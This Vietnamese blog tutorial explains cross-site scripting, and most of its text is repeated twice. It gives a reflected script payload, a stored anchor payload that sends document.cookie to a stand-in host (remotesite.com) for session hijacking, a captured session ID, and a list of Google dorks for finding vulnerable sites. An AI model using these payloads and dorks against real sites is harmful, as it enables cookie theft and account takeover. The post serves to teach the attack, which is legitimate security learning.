1. XSS là gì ?
- Định nghĩa XSS được hiểu là CrossSite-Scripting , một kỹ thuật hack web phổ biến nhất hiện nay bằng cách chèn vào các URL, các textbox trong thẻ HTML những đoạn Script nguy hiểm từ đó chiếm quyền điều khiển victim và victim sẽ thực hiện những mệnh lệnh được đưa ra ! Ngoài ra nó cũng là một trong những vấn đề bảo mật của nhà phát triển web và người sử dụng web .
- Những đoạn mã được chèn vào hầu hết được viết bằng Client-Site Script như JavaScript, JScript, DHTML .
2. Nguyên lý hoạt động XSS .
- Khi bạn truy cập vào 1 đường dẫn đã bị chèn mã độc, bạn sẽ gởi gửi các request từ máy client đến server nhằm chèn vào đó các thông tin vượt quá tầm kiểm soát của server từ đó cookies , mật khẩu của bạn được lưu trên trình duyệt sẽ gởi về attacker thông qua Email hay 1 file nào đó trong host đã được thiết lập từ trước hoặc bị cài backdoor , malware, virus vào máy victim hoặc bạn có thể trở thành công cụ tấn công của attacker !
3. Loại XSS.
- Có 2 loại XSS cơ bản :
1. Persistent
2. Non-Persistent Type
- Non-Presistent Type : là loại XSS phổ biến được dùng hiện nay , nó đòi hỏi victim truy cập vào 1 đường dẫn mà attacker đã thiết lập sẵn , khi victim truy cập vào các liên kết đó các đoạn mã độc sẽ thực thi bởi trình duyệt của victim
Khi chèn XSS sẽ có dạng như sau :
- Presistent : trong trường hợp này các đoạn mã độc sẽ được lưu trữ trong database, phương pháp này sẽ làm thay đổi cấu trúc website hiện tại
Bây giờ attacker sẽ đăng nhập với quyền User như sau :
Khi victim truy cập vào hệ thống , victim sẽ thấy 1 user có tên : BlogiT trùng với tên dùng khác , Victim sẽ nhấp vào liên kết ấy nó sẽ gởi cookies , Session ID đến website của attacker ! Ngay lúc đó attacker có thể gởi các yêu cầu đến website và đăng nhập với quyền là Admin dựa vào các Session ID cho đến khi nó hết hạn !
4. Mức độ nguy hiểm của XSS :
- Ăn cắp Cookies
- Cướp session làm việc
- Cài Malware,Virus,backdoor vào máy victim
- Deface Website tuy nhiên nó chỉ nằm ở phần bề mặt của Website chứ không làm thay đổi cấu trúc Website
5- Phương pháp check site dính lỗ hổng XSS
1: Sử dụng các dork sau để tìm kiếm trên google
Bước 2: Check lỗi XSS
Để check 1 site dính lỗi xss, thông thường ta thêm đoạn script sau <script>alert("Check XSS")</script> . Nếu thấy nó xuất hiện 1 khung thông báo thì site đó đã dính lỗi XSS và attacker có thể sử dụng XSS để chiếm quyền điều khiển hay thực thi những mục đích khác.
- Định nghĩa XSS được hiểu là CrossSite-Scripting , một kỹ thuật hack web phổ biến nhất hiện nay bằng cách chèn vào các URL, các textbox trong thẻ HTML những đoạn Script nguy hiểm từ đó chiếm quyền điều khiển victim và victim sẽ thực hiện những mệnh lệnh được đưa ra ! Ngoài ra nó cũng là một trong những vấn đề bảo mật của nhà phát triển web và người sử dụng web .
- Những đoạn mã được chèn vào hầu hết được viết bằng Client-Site Script như JavaScript, JScript, DHTML .
2. Nguyên lý hoạt động XSS .
- Khi bạn truy cập vào 1 đường dẫn đã bị chèn mã độc, bạn sẽ gởi gửi các request từ máy client đến server nhằm chèn vào đó các thông tin vượt quá tầm kiểm soát của server từ đó cookies , mật khẩu của bạn được lưu trên trình duyệt sẽ gởi về attacker thông qua Email hay 1 file nào đó trong host đã được thiết lập từ trước hoặc bị cài backdoor , malware, virus vào máy victim hoặc bạn có thể trở thành công cụ tấn công của attacker !
3. Loại XSS.
- Có 2 loại XSS cơ bản :
1. Persistent
2. Non-Persistent Type
- Non-Presistent Type : là loại XSS phổ biến được dùng hiện nay , nó đòi hỏi victim truy cập vào 1 đường dẫn mà attacker đã thiết lập sẵn , khi victim truy cập vào các liên kết đó các đoạn mã độc sẽ thực thi bởi trình duyệt của victim
Khi chèn XSS sẽ có dạng như sau :
http://yoursite.com/index.php?name=guest<script>alert('BlogiT')</script>
- Presistent : trong trường hợp này các đoạn mã độc sẽ được lưu trữ trong database, phương pháp này sẽ làm thay đổi cấu trúc website hiện tại
Bây giờ attacker sẽ đăng nhập với quyền User như sau :
<a href=# onclick=\"document.location=\'http://remotesite.com/xss.php?c=\'+escape\(document.cookie\)\;\">BlogiT</a>
Khi victim truy cập vào hệ thống , victim sẽ thấy 1 user có tên : BlogiT trùng với tên dùng khác , Victim sẽ nhấp vào liên kết ấy nó sẽ gởi cookies , Session ID đến website của attacker ! Ngay lúc đó attacker có thể gởi các yêu cầu đến website và đăng nhập với quyền là Admin dựa vào các Session ID cho đến khi nó hết hạn !
xss.php?c=PHPSESSID%3Dvmcsjsgear6gsogpu7o2imr9f3
4. Mức độ nguy hiểm của XSS :
- Ăn cắp Cookies
- Cướp session làm việc
- Cài Malware,Virus,backdoor vào máy victim
- Deface Website tuy nhiên nó chỉ nằm ở phần bề mặt của Website chứ không làm thay đổi cấu trúc Website
5- Phương pháp check site dính lỗ hổng XSS
1: Sử dụng các dork sau để tìm kiếm trên google
123456789inurl:".php?cmd=" inurl:".php?z=" inurl:".php?q=" inurl:".php?search=" inurl:".php?query=" inurl:".php?searchstring=" inurl:".php?keyword=" inurl:".php?file=" inurl:".php?years="12345678910111213141516inurl:".php?txt=" inurl:".php?tag=" inurl:".php?max=" inurl:".php?from=" inurl:".php?author=" inurl:".php?pass=" inurl:".php?feedback=" inurl:".php?mail=" inurl:".php?cat=" inurl:".php?vote=" inurl:search.php?q= inurl:com_feedpostold/feedpost.php?url= inurl:scrapbook.php?id= inurl:headersearch.php?sid= inurl:/poll/default.asp?catid= inurl:/search_results.php?search=
Bước 2: Check lỗi XSS
Để check 1 site dính lỗi xss, thông thường ta thêm đoạn script sau <script>alert("Check XSS")</script> . Nếu thấy nó xuất hiện 1 khung thông báo thì site đó đã dính lỗi XSS và attacker có thể sử dụng XSS để chiếm quyền điều khiển hay thực thi những mục đích khác.
0 comments so far,add yours
Cám ơn đã ghé thăm BlogCNTT!
- Mọi thắc mắc, gợi ý hoặc bình luận xin chia sẻ bên dưới hoặc Liên Hệ
- Hãy viết bằng tiếng Việt có dấu để mọi người dễ đọc hơn!
Thank You!